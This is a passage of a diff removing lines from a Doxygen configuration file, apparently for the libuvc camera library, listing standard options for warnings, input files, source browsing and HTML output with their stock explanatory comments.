-# The GENERATE_TODOLIST tag can be used to enable ( YES) or disable ( NO) the
-# todo list. This list is created by putting \todo commands in the
-# documentation.
-# The default value is: YES.
-
-GENERATE_TODOLIST      = NO
-
-# The GENERATE_TESTLIST tag can be used to enable ( YES) or disable ( NO) the
-# test list. This list is created by putting \test commands in the
-# documentation.
-# The default value is: YES.
-
-GENERATE_TESTLIST      = YES
-
-# The GENERATE_BUGLIST tag can be used to enable ( YES) or disable ( NO) the bug
-# list. This list is created by putting \bug commands in the documentation.
-# The default value is: YES.
-
-GENERATE_BUGLIST       = YES
-
-# The GENERATE_DEPRECATEDLIST tag can be used to enable ( YES) or disable ( NO)
-# the deprecated list. This list is created by putting \deprecated commands in
-# the documentation.
-# The default value is: YES.
-
-GENERATE_DEPRECATEDLIST= YES
-
-# The ENABLED_SECTIONS tag can be used to enable conditional documentation
-# sections, marked by \if <section_label> ... \endif and \cond <section_label>
-# ... \endcond blocks.
-
-ENABLED_SECTIONS       =
-
-# The MAX_INITIALIZER_LINES tag determines the maximum number of lines that the
-# initial value of a variable or macro / define can have for it to appear in the
-# documentation. If the initializer consists of more lines than specified here
-# it will be hidden. Use a value of 0 to hide initializers completely. The
-# appearance of the value of individual variables and macros / defines can be
-# controlled using \showinitializer or \hideinitializer command in the
-# documentation regardless of this setting.
-# Minimum value: 0, maximum value: 10000, default value: 30.
-
-MAX_INITIALIZER_LINES  = 30
-
-# Set the SHOW_USED_FILES tag to NO to disable the list of files generated at
-# the bottom of the documentation of classes and structs. If set to YES the list
-# will mention the files that were used to generate the documentation.
-# The default value is: YES.
-
-SHOW_USED_FILES        = YES
-
-# Set the SHOW_FILES tag to NO to disable the generation of the Files page. This
-# will remove the Files entry from the Quick Index and from the Folder Tree View
-# (if specified).
-# The default value is: YES.
-
-SHOW_FILES             = YES
-
-# Set the SHOW_NAMESPACES tag to NO to disable the generation of the Namespaces
-# page. This will remove the Namespaces entry from the Quick Index and from the
-# Folder Tree View (if specified).
-# The default value is: YES.
-
-SHOW_NAMESPACES        = YES
-
-# The FILE_VERSION_FILTER tag can be used to specify a program or script that
-# doxygen should invoke to get the current version for each file (typically from
-# the version control system). Doxygen will invoke the program by executing (via
-# popen()) the command command input-file, where command is the value of the
-# FILE_VERSION_FILTER tag, and input-file is the name of an input file provided
-# by doxygen. Whatever the program writes to standard output is used as the file
-# version. For an example see the documentation.
-
-FILE_VERSION_FILTER    =
-
-# The LAYOUT_FILE tag can be used to specify a layout file which will be parsed
-# by doxygen. The layout file controls the global structure of the generated
-# output files in an output format independent way. To create the layout file
-# that represents doxygen's defaults, run doxygen with the -l option. You can
-# optionally specify a file name after the option, if omitted DoxygenLayout.xml
-# will be used as the name of the layout file.
-#
-# Note that if you run doxygen from a directory containing a file called
-# DoxygenLayout.xml, doxygen will parse it automatically even if the LAYOUT_FILE
-# tag is left empty.
-
-LAYOUT_FILE            =
-
-# The CITE_BIB_FILES tag can be used to specify one or more bib files containing
-# the reference definitions. This must be a list of .bib files. The .bib
-# extension is automatically appended if omitted. This requires the bibtex tool
-# to be installed. See also http://en.wikipedia.org/wiki/BibTeX for more info.
-# For LaTeX the style of the bibliography can be controlled using
-# LATEX_BIB_STYLE. To use this feature you need bibtex and perl available in the
-# search path. Do not use file names with spaces, bibtex cannot handle them. See
-# also \cite for info how to create references.
-
-CITE_BIB_FILES         =
-
-#---------------------------------------------------------------------------
-# Configuration options related to warning and progress messages
-#---------------------------------------------------------------------------
-
-# The QUIET tag can be used to turn on/off the messages that are generated to
-# standard output by doxygen. If QUIET is set to YES this implies that the
-# messages are off.
-# The default value is: NO.
-
-QUIET                  = NO
-
-# The WARNINGS tag can be used to turn on/off the warning messages that are
-# generated to standard error ( stderr) by doxygen. If WARNINGS is set to YES
-# this implies that the warnings are on.
-#
-# Tip: Turn warnings on while writing the documentation.
-# The default value is: YES.
-
-WARNINGS               = YES
-
-# If the WARN_IF_UNDOCUMENTED tag is set to YES, then doxygen will generate
-# warnings for undocumented members. If EXTRACT_ALL is set to YES then this flag
-# will automatically be disabled.
-# The default value is: YES.
-
-WARN_IF_UNDOCUMENTED   = YES
-
-# If the WARN_IF_DOC_ERROR tag is set to YES, doxygen will generate warnings for
-# potential errors in the documentation, such as not documenting some parameters
-# in a documented function, or documenting parameters that don't exist or using
-# markup commands wrongly.
-# The default value is: YES.
-
-WARN_IF_DOC_ERROR      = YES
-
-# This WARN_NO_PARAMDOC option can be enabled to get warnings for functions that
-# are documented, but have no documentation for their parameters or return
-# value. If set to NO doxygen will only warn about wrong or incomplete parameter
-# documentation, but not about the absence of documentation.
-# The default value is: NO.
-
-WARN_NO_PARAMDOC       = NO
-
-# The WARN_FORMAT tag determines the format of the warning messages that doxygen
-# can produce. The string should contain the $file, $line, and $text tags, which
-# will be replaced by the file and line number from which the warning originated
-# and the warning text. Optionally the format may contain $version, which will
-# be replaced by the version of the file (if it could be obtained via
-# FILE_VERSION_FILTER)
-# The default value is: $file:$line: $text.
-
-WARN_FORMAT            = "$file:$line: $text"
-
-# The WARN_LOGFILE tag can be used to specify a file to which warning and error
-# messages should be written. If left blank the output is written to standard
-# error (stderr).
-
-WARN_LOGFILE           =
-
-#---------------------------------------------------------------------------
-# Configuration options related to the input files
-#---------------------------------------------------------------------------
-
-# The INPUT tag is used to specify the files and/or directories that contain
-# documented source files. You may enter file names like myfile.cpp or
-# directories like /usr/src/myproject. Separate the files or directories with
-# spaces.
-# Note: If this tag is empty the current directory is searched.
-
-INPUT                  = src \
-                         include/libuvc
-
-# This tag can be used to specify the character encoding of the source files
-# that doxygen parses. Internally doxygen uses the UTF-8 encoding. Doxygen uses
-# libiconv (or the iconv built into libc) for the transcoding. See the libiconv
-# documentation (see: http://www.gnu.org/software/libiconv) for the list of
-# possible encodings.
-# The default value is: UTF-8.
-
-INPUT_ENCODING         = UTF-8
-
-# If the value of the INPUT tag contains directories, you can use the
-# FILE_PATTERNS tag to specify one or more wildcard patterns (like *.cpp and
-# *.h) to filter out the source-files in the directories. If left blank the
-# following patterns are tested:*.c, *.cc, *.cxx, *.cpp, *.c++, *.java, *.ii,
-# *.ixx, *.ipp, *.i++, *.inl, *.idl, *.ddl, *.odl, *.h, *.hh, *.hxx, *.hpp,
-# *.h++, *.cs, *.d, *.php, *.php4, *.php5, *.phtml, *.inc, *.m, *.markdown,
-# *.md, *.mm, *.dox, *.py, *.f90, *.f, *.for, *.tcl, *.vhd, *.vhdl, *.ucf,
-# *.qsf, *.as and *.js.
-
-FILE_PATTERNS          =
-
-# The RECURSIVE tag can be used to specify whether or not subdirectories should
-# be searched for input files as well.
-# The default value is: NO.
-
-RECURSIVE              = NO
-
-# The EXCLUDE tag can be used to specify files and/or directories that should be
-# excluded from the INPUT source files. This way you can easily exclude a
-# subdirectory from a directory tree whose root is specified with the INPUT tag.
-#
-# Note that relative paths are relative to the directory from which doxygen is
-# run.
-
-EXCLUDE                = include/libuvc/libuvc_internal.h \
-                         include/utlist.h
-
-# The EXCLUDE_SYMLINKS tag can be used to select whether or not files or
-# directories that are symbolic links (a Unix file system feature) are excluded
-# from the input.
-# The default value is: NO.
-
-EXCLUDE_SYMLINKS       = NO
-
-# If the value of the INPUT tag contains directories, you can use the
-# EXCLUDE_PATTERNS tag to specify one or more wildcard patterns to exclude
-# certain files from those directories.
-#
-# Note that the wildcards are matched against the file with absolute path, so to
-# exclude all test directories for example use the pattern */test/*
-
-EXCLUDE_PATTERNS       =
-
-# The EXCLUDE_SYMBOLS tag can be used to specify one or more symbol names
-# (namespaces, classes, functions, etc.) that should be excluded from the
-# output. The symbol name can be a fully qualified name, a word, or if the
-# wildcard * is used, a substring. Examples: ANamespace, AClass,
-# AClass::ANamespace, ANamespace::*Test
-#
-# Note that the wildcards are matched against the file with absolute path, so to
-# exclude all test directories use the pattern */test/*
-
-EXCLUDE_SYMBOLS        =
-
-# The EXAMPLE_PATH tag can be used to specify one or more files or directories
-# that contain example code fragments that are included (see the \include
-# command).
-
-EXAMPLE_PATH           = src
-
-# If the value of the EXAMPLE_PATH tag contains directories, you can use the
-# EXAMPLE_PATTERNS tag to specify one or more wildcard pattern (like *.cpp and
-# *.h) to filter out the source-files in the directories. If left blank all
-# files are included.
-
-EXAMPLE_PATTERNS       =
-
-# If the EXAMPLE_RECURSIVE tag is set to YES then subdirectories will be
-# searched for input files to be used with the \include or \dontinclude commands
-# irrespective of the value of the RECURSIVE tag.
-# The default value is: NO.
-
-EXAMPLE_RECURSIVE      = NO
-
-# The IMAGE_PATH tag can be used to specify one or more files or directories
-# that contain images that are to be included in the documentation (see the
-# \image command).
-
-IMAGE_PATH             =
-
-# The INPUT_FILTER tag can be used to specify a program that doxygen should
-# invoke to filter for each input file. Doxygen will invoke the filter program
-# by executing (via popen()) the command:
-#
-# <filter> <input-file>
-#
-# where <filter> is the value of the INPUT_FILTER tag, and <input-file> is the
-# name of an input file. Doxygen will then use the output that the filter
-# program writes to standard output. If FILTER_PATTERNS is specified, this tag
-# will be ignored.
-#
-# Note that the filter must not add or remove lines; it is applied before the
-# code is scanned, but not when the output code is generated. If lines are added
-# or removed, the anchors will not be placed correctly.
-
-INPUT_FILTER           =
-
-# The FILTER_PATTERNS tag can be used to specify filters on a per file pattern
-# basis. Doxygen will compare the file name with each pattern and apply the
-# filter if there is a match. The filters are a list of the form: pattern=filter
-# (like *.cpp=my_cpp_filter). See INPUT_FILTER for further information on how
-# filters are used. If the FILTER_PATTERNS tag is empty or if none of the
-# patterns match the file name, INPUT_FILTER is applied.
-
-FILTER_PATTERNS        =
-
-# If the FILTER_SOURCE_FILES tag is set to YES, the input filter (if set using
-# INPUT_FILTER ) will also be used to filter the input files that are used for
-# producing the source files to browse (i.e. when SOURCE_BROWSER is set to YES).
-# The default value is: NO.
-
-FILTER_SOURCE_FILES    = NO
-
-# The FILTER_SOURCE_PATTERNS tag can be used to specify source filters per file
-# pattern. A pattern will override the setting for FILTER_PATTERN (if any) and
-# it is also possible to disable source filtering for a specific pattern using
-# *.ext= (so without naming a filter).
-# This tag requires that the tag FILTER_SOURCE_FILES is set to YES.
-
-FILTER_SOURCE_PATTERNS =
-
-# If the USE_MDFILE_AS_MAINPAGE tag refers to the name of a markdown file that
-# is part of the input, its contents will be placed on the main page
-# (index.html). This can be useful if you have a project on for instance GitHub
-# and want to reuse the introduction page also for the doxygen output.
-
-USE_MDFILE_AS_MAINPAGE =
-
-#---------------------------------------------------------------------------
-# Configuration options related to source browsing
-#---------------------------------------------------------------------------
-
-# If the SOURCE_BROWSER tag is set to YES then a list of source files will be
-# generated. Documented entities will be cross-referenced with these sources.
-#
-# Note: To get rid of all source code in the generated output, make sure that
-# also VERBATIM_HEADERS is set to NO.
-# The default value is: NO.
-
-SOURCE_BROWSER         = NO
-
-# Setting the INLINE_SOURCES tag to YES will include the body of functions,
-# classes and enums directly into the documentation.
-# The default value is: NO.
-
-INLINE_SOURCES         = NO
-
-# Setting the STRIP_CODE_COMMENTS tag to YES will instruct doxygen to hide any
-# special comment blocks from generated source code fragments. Normal C, C++ and
-# Fortran comments will always remain visible.
-# The default value is: YES.
-
-STRIP_CODE_COMMENTS    = YES
-
-# If the REFERENCED_BY_RELATION tag is set to YES then for each documented
-# function all documented functions referencing it will be listed.
-# The default value is: NO.
-
-REFERENCED_BY_RELATION = NO
-
-# If the REFERENCES_RELATION tag is set to YES then for each documented function
-# all documented entities called/used by that function will be listed.
-# The default value is: NO.
-
-REFERENCES_RELATION    = NO
-
-# If the REFERENCES_LINK_SOURCE tag is set to YES and SOURCE_BROWSER tag is set
-# to YES, then the hyperlinks from functions in REFERENCES_RELATION and
-# REFERENCED_BY_RELATION lists will link to the source code. Otherwise they will
-# link to the documentation.
-# The default value is: YES.
-
-REFERENCES_LINK_SOURCE = YES
-
-# If SOURCE_TOOLTIPS is enabled (the default) then hovering a hyperlink in the
-# source code will show a tooltip with additional information such as prototype,
-# brief description and links to the definition and documentation. Since this
-# will make the HTML file larger and loading of large files a bit slower, you
-# can opt to disable this feature.
-# The default value is: YES.
-# This tag requires that the tag SOURCE_BROWSER is set to YES.
-
-SOURCE_TOOLTIPS        = YES
-
-# If the USE_HTAGS tag is set to YES then the references to source code will
-# point to the HTML generated by the htags(1) tool instead of doxygen built-in
-# source browser. The htags tool is part of GNU's global source tagging system
-# (see http://www.gnu.org/software/global/global.html). You will need version
-# 4.8.6 or higher.
-#
-# To use it do the following:
-# - Install the latest version of global
-# - Enable SOURCE_BROWSER and USE_HTAGS in the config file
-# - Make sure the INPUT points to the root of the source tree
-# - Run doxygen as normal
-#
-# Doxygen will invoke htags (and that will in turn invoke gtags), so these
-# tools must be available from the command line (i.e. in the search path).
-#
-# The result: instead of the source browser generated by doxygen, the links to
-# source code will now point to the output of htags.
-# The default value is: NO.
-# This tag requires that the tag SOURCE_BROWSER is set to YES.
-
-USE_HTAGS              = NO
-
-# If the VERBATIM_HEADERS tag is set the YES then doxygen will generate a
-# verbatim copy of the header file for each class for which an include is
-# specified. Set to NO to disable this.
-# See also: Section \class.
-# The default value is: YES.
-
-VERBATIM_HEADERS       = YES
-
-#---------------------------------------------------------------------------
-# Configuration options related to the alphabetical class index
-#---------------------------------------------------------------------------
-
-# If the ALPHABETICAL_INDEX tag is set to YES, an alphabetical index of all
-# compounds will be generated. Enable this if the project contains a lot of
-# classes, structs, unions or interfaces.
-# The default value is: YES.
-
-ALPHABETICAL_INDEX     = YES
-
-# The COLS_IN_ALPHA_INDEX tag can be used to specify the number of columns in
-# which the alphabetical index list will be split.
-# Minimum value: 1, maximum value: 20, default value: 5.
-# This tag requires that the tag ALPHABETICAL_INDEX is set to YES.
-
-COLS_IN_ALPHA_INDEX    = 5
-
-# In case all classes in a project start with a common prefix, all classes will
-# be put under the same header in the alphabetical index. The IGNORE_PREFIX tag
-# can be used to specify a prefix (or a list of prefixes) that should be ignored
-# while generating the index headers.
-# This tag requires that the tag ALPHABETICAL_INDEX is set to YES.
-
-IGNORE_PREFIX          =
-
-#---------------------------------------------------------------------------
-# Configuration options related to the HTML output
-#---------------------------------------------------------------------------
-
-# If the GENERATE_HTML tag is set to YES doxygen will generate HTML output
-# The default value is: YES.
-
-GENERATE_HTML          = YES
-
-# The HTML_OUTPUT tag is used to specify where the HTML docs will be put. If a
-# relative path is entered the value of OUTPUT_DIRECTORY will be put in front of
-# it.
-# The default directory is: html.
-# This tag requires that the tag GENERATE_HTML is set to YES.
-
-HTML_OUTPUT            = doc
-
-# The HTML_FILE_EXTENSION tag can be used to specify the file extension for each
-# generated HTML page (for example: .htm, .php, .asp).
-# The default value is: .html.
-# This tag requires that the tag GENERATE_HTML is set to YES.
-
-HTML_FILE_EXTENSION    = .html
-
-# The HTML_HEADER tag can be used to specify a user-defined HTML header file for
-# each generated HTML page. If the tag is left blank doxygen will generate a
-# standard header.
-#
-# To get valid HTML the header file that includes any scripts and style sheets
-# that doxygen needs, which is dependent on the configuration options used (e.g.
-# the setting GENERATE_TREEVIEW). It is highly recommended to start with a
-# default header using
-# doxygen -w html new_header.html new_footer.html new_stylesheet.css
-# YourConfigFile
-# and then modify the file new_header.html. See also section "Doxygen usage"
-# for information on how to generate the default header that doxygen normally
-# uses.
-# Note: The header is subject to change so you typically have to regenerate the
-# default header when upgrading to a newer version of doxygen. For a description
-# of the possible markers and block names see the documentation.
-# This tag requires that the tag GENERATE_HTML is set to YES.
-
-HTML_HEADER            =
-
-# The HTML_FOOTER tag can be used to specify a user-defined HTML footer for each
-# generated HTML page. If the tag is left blank doxygen will generate a standard
-# footer. See HTML_HEADER for more information on how to generate a default
-# footer and what special commands can be used inside the footer. See also
-# section "Doxygen usage" for information on how to generate the default footer
-# that doxygen normally uses.
-# This tag requires that the tag GENERATE_HTML is set to YES.
-
-HTML_FOOTER            =
-
-# The HTML_STYLESHEET tag can be used to specify a user-defined cascading style
-# sheet that is used by each HTML page. It can be used to fine-tune the look of
-# the HTML output. If left blank doxygen will generate a default style sheet.
-# See also section "Doxygen usage" for information on how to generate the style
-# sheet that doxygen normally uses.
-# Note: It is recommended to use HTML_EXTRA_STYLESHEET instead of this tag, as
-# it is more robust and this tag (HTML_STYLESHEET) will in the future become
-# obsolete.
-# This tag requires that the tag GENERATE_HTML is set to YES.
-
-HTML_STYLESHEET        =
-
-# The HTML_EXTRA_STYLESHEET tag can be used to specify an additional user-
-# defined cascading style sheet that is included after the standard style sheets
-# created by doxygen. Using this option one can overrule certain style aspects.
-# This is preferred over using HTML_STYLESHEET since it does not replace the
-# standard style sheet and is therefor more robust against future updates.
-# Doxygen will copy the style sheet file to the output directory. For an example
-# see the documentation.
-# This tag requires that the tag GENERATE_HTML is set to YES.
-
-HTML_EXTRA_STYLESHEET  =
-
-# The HTML_EXTRA_FILES tag can be used to specify one or more extra images or
-# other source files which should be copied to the HTML output directory. Note
-# that these files will be copied to the base HTML output directory. Use the
-# $relpath^ marker in the HTML_HEADER and/or HTML_FOOTER files to load these
-# files. In the HTML_STYLESHEET file, use the file name only. Also note that the
-# files will be copied as-is; there are no commands or markers available.
-# This tag requires that the tag GENERATE_HTML is set to YES.
-
-HTML_EXTRA_FILES       =
-
-# The HTML_COLORSTYLE_HUE tag controls the color of the HTML output. Doxygen
-# will adjust the colors in the stylesheet and background images according to
-# this color. Hue is specified as an angle on a colorwheel, see
-# http://en.wikipedia.org/wiki/Hue for more information. For instance the value
-# 0 represents red, 60 is yellow, 120 is green, 180 is cyan, 240 is blue, 300
-# purple, and 360 is red again.
-# Minimum value: 0, maximum value: 359, default value: 220.
-# This tag requires that the tag GENERATE_HTML is set to YES.
-
-HTML_COLORSTYLE_HUE    = 220
-
-# The HTML_COLORSTYLE_SAT tag controls the purity (or saturation) of the colors
-# in the HTML output. For a value of 0 the output will use grayscales only. A
-# value of 255 will produce the most vivid colors.
-# Minimum value: 0, maximum value: 255, default value: 100.
-# This tag requires that the tag GENERATE_HTML is set to YES.
-
-HTML_COLORSTYLE_SAT    = 100
-
-# The HTML_COLORSTYLE_GAMMA tag controls the gamma correction applied to the
-# luminance component of the colors in the HTML output. Values below 100
-# gradually make the output lighter, whereas values above 100 make the output
-# darker. The value divided by 100 is the actual gamma applied, so 80 represents
-# a gamma of 0.8, The value 220 represents a gamma of 2.2, and 100 does not
-# change the gamma.
-# Minimum value: 40, maximum value: 240, default value: 80.
-# This tag requires that the tag GENERATE_HTML is set to YES.
-
-HTML_COLORSTYLE_GAMMA  = 80
-
-# If the HTML_TIMESTAMP tag is set to YES then the footer of each generated HTML
-# page will contain the date and time when the page was generated. Setting this
-# to NO can help when comparing the output of multiple runs.
-# The default value is: YES.
-# This tag requires that the tag GENERATE_HTML is set to YES.
-
-HTML_TIMESTAMP         = YES
-
-# If the HTML_DYNAMIC_SECTIONS tag is set to YES then the generated HTML
-# documentation will contain sections that can be hidden and shown after the
-# page has loaded.
-# The default value is: NO.
-# This tag requires that the tag GENERATE_HTML is set to YES.
-
-HTML_DYNAMIC_SECTIONS  = YES
-
-# With HTML_INDEX_NUM_ENTRIES one can control the preferred number of entries
-# shown in the various tree structured indices initially; the user can expand
-# and collapse entries dynamically later on. Doxygen will expand the tree to
-# such a level that at most the specified number of entries are visible (unless
-# a fully collapsed tree already exceeds this amount). So setting the number of
-# entries 1 will produce a full collapsed tree by default. 0 is a special value
-# representing an infinite number of entries and will result in a full expanded
-# tree by default.
-# Minimum value: 0, maximum value: 9999, default value: 100.
-# This tag requires that the tag GENERATE_HTML is set to YES.
-
-HTML_INDEX_NUM_ENTRIES = 100
-
-# If the GENERATE_DOCSET tag is set to YES, additional index files will be
-# generated that can be used as input for Apple's Xcode 3 integrated development
-# environment (see: http://developer.apple.com/tools/xcode/), introduced with
-# OSX 10.5 (Leopard). To create a documentation set, doxygen will generate a
-# Makefile in the HTML output directory. Running make will produce the docset in
-# that directory and running make install will install the docset in
-# ~/Library/Developer/Shared/Documentation/DocSets so that Xcode will find it at
-# startup. See http://developer.apple.com/tools/creatingdocsetswithdoxygen.html
-# for more information.
-# The default value is: NO.
-# This tag requires that the tag GENERATE_HTML is set to YES.
-
-GENERATE_DOCSET        = NO
-
-# This tag determines the name of the docset feed. A documentation feed provides
-# an umbrella under which multiple documentation sets from a single provider
-# (such as a company or product suite) can be grouped.
-# The default value is: Doxygen generated docs.
-# This tag requires that the tag GENERATE_DOCSET is set to YES.
-
-DOCSET_FEEDNAME        = "Doxygen generated docs"
-
-# This tag specifies a string that should uniquely identify the documentation
-# set bundle. This should be a reverse domain-name style string, e.g.
-# com.mycompany.MyDocSet. Doxygen will append .docset to the name.
-# The default value is: org.doxygen.Project.
-# This tag requires that the tag GENERATE_DOCSET is set to YES.
-
-DOCSET_BUNDLE_ID       = org.doxygen.Project
-
-# The DOCSET_PUBLISHER_ID tag specifies a string that should uniquely identify
-# the documentation publisher. This should be a reverse domain-name style
-# string, e.g. com.mycompany.MyDocSet.documentation.
-# The default value is: org.doxygen.Publisher.
-# This tag requires that the tag GENERATE_DOCSET is set to YES.
-
-DOCSET_PUBLISHER_ID    = org.doxygen.Publisher
-
-# The DOCSET_PUBLISHER_NAME tag identifies the documentation publisher.
-# The default value is: Publisher.
-# This tag requires that the tag GENERATE_DOCSET is set to YES.
-
-DOCSET_PUBLISHER_NAME  = Publisher
-
-# If the GENERATE_HTMLHELP tag is set to YES then doxygen generates three
-# additional HTML index files: index.hhp, index.hhc, and index.hhk. The
-# index.hhp is a project file that can be read by Microsoft's HTML Help Workshop
-# (see: http://www.microsoft.com/en-us/download/details.aspx?id=21138) on
-# Windows.
-#
-# The HTML Help Workshop contains a compiler that can convert all HTML output
-# generated by doxygen into a single compiled HTML file (.chm). Compiled HTML
-# files are now used as the Windows 98 help format, and will replace the old
-# Windows help format (.hlp) on all Windows platforms in the future. Compressed
-# HTML files also contain an index, a table of contents, and you can search for
-# words in the documentation. The HTML workshop also contains a viewer for
-# compressed HTML files.
-# The default value is: NO.
-# This tag requires that the tag GENERATE_HTML is set to YES.
-
-GENERATE_HTMLHELP      = NO
-
-# The CHM_FILE tag can be used to specify the file name of the resulting .chm
-# file. You can add a path in front of the file if the result should not be
-# written to the html output directory.
-# This tag requires that the tag GENERATE_HTMLHELP is set to YES.
-
-CHM_FILE               =
-
-# The HHC_LOCATION tag can be used to specify the location (absolute path
-# including file name) of the HTML help compiler ( hhc.exe). If non-empty
-# doxygen will try to run the HTML help compiler on the generated index.hhp.
-# The file has to be specified with full path.
-# This tag requires that the tag GENERATE_HTMLHELP is set to YES.
-
-HHC_LOCATION           =
-
-# The GENERATE_CHI flag controls if a separate .chi index file is generated (
-# YES) or that it should be included in the master .chm file ( NO).
-# The default value is: NO.
-# This tag requires that the tag GENERATE_HTMLHELP is set to YES.
-
-GENERATE_CHI           = NO
-
-# The CHM_INDEX_ENCODING is used to encode HtmlHelp index ( hhk), content ( hhc)
-# and project file content.
-# This tag requires that the tag GENERATE_HTMLHELP is set to YES.
-
-CHM_INDEX_ENCODING     =
-
-# The BINARY_TOC flag controls whether a binary table of contents is generated (
-# YES) or a normal table of contents ( NO) in the .chm file.
-# The default value is: NO.
-# This tag requires that the tag GENERATE_HTMLHELP is set to YES.
-
-BINARY_TOC             = NO
-
-# The TOC_EXPAND flag can be set to YES to add extra items for group members to
-# the table of contents of the HTML help documentation and to the tree view.
-# The default value is: NO.
-# This tag requires that the tag GENERATE_HTMLHELP is set to YES.
-
-TOC_EXPAND             = NO
-
-# If the GENERATE_QHP tag is set to YES and both QHP_NAMESPACE and
-# QHP_VIRTUAL_FOLDER are set, an additional index file will be generated that
-# can be used as input for Qt's qhelpgenerator to generate a Qt Compressed Help
-# (.qch) of the generated HTML documentation.
-# The default value is: NO.
-# This tag requires that the tag GENERATE_HTML is set to YES.
-
-GENERATE_QHP           = NO
-
-# If the QHG_LOCATION tag is specified, the QCH_FILE tag can be used to specify
-# the file name of the resulting .qch file. The path specified is relative to
-# the HTML output folder.
-# This tag requires that the tag GENERATE_QHP is set to YES.
-
-QCH_FILE               =
-
-# The QHP_NAMESPACE tag specifies the namespace to use when generating Qt Help
-# Project output. For more information please see Qt Help Project / Namespace
-# (see: http://qt-project.org/doc/qt-4.8/qthelpproject.html#namespace).
-# The default value is: org.doxygen.Project.
-# This tag requires that the tag GENERATE_QHP is set to YES.
-
-QHP_NAMESPACE          = org.doxygen.Project
-
-# The QHP_VIRTUAL_FOLDER tag specifies the namespace to use when generating Qt
-# Help Project output. For more information please see Qt Help Project / Virtual
-# Folders (see: http://qt-project.org/doc/qt-4.8/qthelpproject.html#virtual-
-# folders).
-# The default value is: doc.
-# This tag requires that the tag GENERATE_QHP is set to YES.
-
-QHP_VIRTUAL_FOLDER     = doc
-
-# If the QHP_CUST_FILTER_NAME tag is set, it specifies the name of a custom
-# filter to add. For more information please see Qt Help Project / Custom
-# Filters (see: http://qt-project.org/doc/qt-4.8/qthelpproject.html#custom-
-# filters).
-# This tag requires that the tag GENERATE_QHP is set to YES.
-
-QHP_CUST_FILTER_NAME   =
-
-# The QHP_CUST_FILTER_ATTRS tag specifies the list of the attributes of the
-# custom filter to add. For more information please see Qt Help Project / Custom
-# Filters (see: http://qt-project.org/doc/qt-4.8/qthelpproject.html#custom-
-# filters).
-# This tag requires that the tag GENERATE_QHP is set to YES.
-
-QHP_CUST_FILTER_ATTRS  =
-
-# The QHP_SECT_FILTER_ATTRS tag specifies the list of the attributes this
-# project's filter section matches. Qt Help Project / Filter Attributes (see:
-# http://qt-project.org/doc/qt-4.8/qthelpproject.html#filter-attributes).
-# This tag requires that the tag GENERATE_QHP is set to YES.
-
-QHP_SECT_FILTER_ATTRS  =
-
-# The QHG_LOCATION tag can be used to specify the location of Qt's
-# qhelpgenerator. If non-empty doxygen will try to run qhelpgenerator on the
-# generated .qhp file.
-# This tag requires that the tag GENERATE_QHP is set to YES.
-
-QHG_LOCATION           =
-
-# If the GENERATE_ECLIPSEHELP tag is set to YES, additional index files will be
-# generated, together with the HTML files, they form an Eclipse help plugin. To
-# install this plugin and make it available under the help contents menu in
-# Eclipse, the contents of the directory containing the HTML and XML files needs
-# to be copied into the plugins directory of eclipse. The name of the directory
-# within the plugins directory should be the same as the ECLIPSE_DOC_ID value.
-# After copying Eclipse needs to be restarted before the help appears.
-# The default value is: NO.
-# This tag requires that the tag GENERATE_HTML is set to YES.
-
-GENERATE_ECLIPSEHELP   = NO
-
-# A unique identifier for the Eclipse help plugin. When installing the plugin
-# the directory name containing the HTML and XML files should also have this
-# name. Each documentation set should have its own identifier.
-# The default value is: org.doxygen.Project.
-# This tag requires that the tag GENERATE_ECLIPSEHELP is set to YES.
-
-ECLIPSE_DOC_ID         = org.doxygen.Project
-
-# If you want full control over the layout of the generated HTML pages it might
-# be necessary to disable the index and replace it with your own. The
-# DISABLE_INDEX tag can be used to turn on/off the condensed index (tabs) at top
-# of each HTML page. A value of NO enables the index and the value YES disables
-# it. Since the tabs in the index contain the same information as the navigation
-# tree, you can set this option to YES if you also set GENERATE_TREEVIEW to YES.
-# The default value is: NO.
-# This tag requires that the tag GENERATE_HTML is set to YES.
-
-DISABLE_INDEX          = NO
-
-# The GENERATE_TREEVIEW tag is used to specify whether a tree-like index
-# structure should be generated to display hierarchical information. If the tag
-# value is set to YES, a side panel will be generated containing a tree-like
-# index structure (just like the one that is generated for HTML Help). For this
-# to work a browser that supports JavaScript, DHTML, CSS and frames is required
-# (i.e. any modern browser). Windows users are probably better off using the
-# HTML help feature. Via custom stylesheets (see HTML_EXTRA_STYLESHEET) one can
-# further fine-tune the look of the index. As an example, the default style
-# sheet generated by doxygen has an example that shows how to put an image at
-# the root of the tree instead of the PROJECT_NAME. Since the tree basically has
-# the same information as the tab index, you could consider setting
-# DISABLE_INDEX to YES when enabling this option.
-# The default value is: NO.
-# This tag requires that the tag GENERATE_HTML is set to YES.
-
-GENERATE_TREEVIEW      = NO
-
-# The ENUM_VALUES_PER_LINE tag can be used to set the number of enum values that
-# doxygen will group on one line in the generated HTML documentation.
-#
-# Note that a value of 0 will completely suppress the enum values from appearing
-# in the overview section.
-# Minimum value: 0, maximum value: 20, default value: 4.
-# This tag requires that the tag GENERATE_HTML is set to YES.
-
-ENUM_VALUES_PER_LINE   = 4
-
-# If the treeview is enabled (see GENERATE_TREEVIEW) then this tag can be used
-# to set the initial width (in pixels) of the frame in which the tree is shown.
-# Minimum value: 0, maximum value: 1500, default value: 250.
-# This tag requires that the tag GENERATE_HTML is set to YES.
-
-TREEVIEW_WIDTH         = 250
-
-# When the EXT_LINKS_IN_WINDOW option is set to YES doxygen will open links to
-# external symbols imported via tag files in a separate window.
-# The default value is: NO.
-# This tag requires that the tag GENERATE_HTML is set to YES.
-
-EXT_LINKS_IN_WINDOW    = NO
-
-# Use this tag to change the font size of LaTeX formulas included as images in
-# the HTML documentation. When you change the font size after a successful
-# doxygen run you need to manually remove any form_*.png images from the HTML
-# output directory to force them to be regenerated.
-# Minimum value: 8, maximum value: 50, default value: 10.
-# This tag requires that the tag GENERATE_HTML is set to YES.
-
-FORMULA_FONTSIZE       = 10
-
-# Use the FORMULA_TRANPARENT tag to determine whether or not the images
-# generated for formulas are transparent PNGs. Transparent PNGs are not
-# supported properly for IE 6.0, but are supported on all modern browsers.
-#
-# Note that when changing this option you need to delete any form_*.png files in
-# the HTML output directory before the changes have effect.
-# The default value is: YES.
-# This tag requires that the tag GENERATE_HTML is set to YES.
-
-FORMULA_TRANSPARENT    = YES
-
-# Enable the USE_MATHJAX option to render LaTeX formulas using MathJax (see
-# http://www.mathjax.org) which uses client side Javascript for the rendering
-# instead of using prerendered bitmaps. Use this if you do not have LaTeX
-# installed or if you want to formulas look prettier in the HTML output. When
-# enabled you may also need to install MathJax separately and configure the path
-# to it using the MATHJAX_RELPATH option.
